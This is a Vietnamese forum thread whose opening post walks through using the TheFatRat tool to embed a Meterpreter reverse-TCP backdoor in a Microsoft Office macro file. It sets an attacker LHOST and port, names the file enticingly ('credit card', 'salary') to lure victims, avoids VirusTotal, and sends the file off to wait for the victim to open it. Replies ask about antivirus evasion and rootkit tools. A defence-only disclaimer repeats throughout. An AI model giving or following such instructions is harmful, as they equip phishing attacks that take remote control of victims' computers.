Tạo Microsoft Office backdoor với TheFatRat

maldet

VIP Members
31/08/2016
112
103 bài viết
Tạo Microsoft Office backdoor với TheFatRat
TheFatRat là một công cụ tạo backdoor khá hay. Tuy nhiên, trong bài này mình sẽ chỉ hướng dẫn sử dụng công cụ TheFatRat để chèn backdoor vào tập tin Office trên nền tảng Windows. Ngoài ra các bạn có thể mày mò thêm các chức năng khác.
Cần chuẩn bị:
  • TheFatRat (đương nhiên)
  • Kali Linux
Các bước thực hiện:
1. Cài đặt TheFatRat:


thefatrat.png

2. Sau khi cài đặt thành công và chạy TheFatRat, lần lượt thực hiện theo thứ tự sau:
Chọn [6] Create Fud Backdoor 1000% with PwnWinds [Excellent]
Chọn [2] The Microsoft Office Macro on Windows
SET LHOST: IP của kẻ tấn công
SET LPORT: cổng dịch vụ
Enter the base name for output files: tên của tập tin được chèn backdoor, đặt cho hấp dẫn để kích thích nạn nhân muốn mở ra (ví dụ: credit card, salary, ...).
Hộp thoại Available Payloads: Chọn windows/meterpreter/reverse_tcp
Sau đó chờ backdoor được tạo tự động. Nên nhớ đừng tải "sản phẩm" lên Virustotal nhé :D
3. Gửi "sản phẩm" cho nạn nhân, làm tách cafe và chờ nạn nhân mở lên để khai thác thôi!
Video demo để dễ theo dõi:
 
Chỉnh sửa lần cuối:
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  • Thích
Reactions: Sugi_b3o and whf
Anh ơi cho em hỏi xíu , liệu phần mềm diệt virus có phát hiện được không ạ ??
 
Chỉnh sửa lần cuối:
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Và có công cụ nào tạo Rootkit...
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
SET LHOST: IP của nạn nhân
có gì đó sai sai
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  • Thích
Reactions: maldet
Comment
Bên trên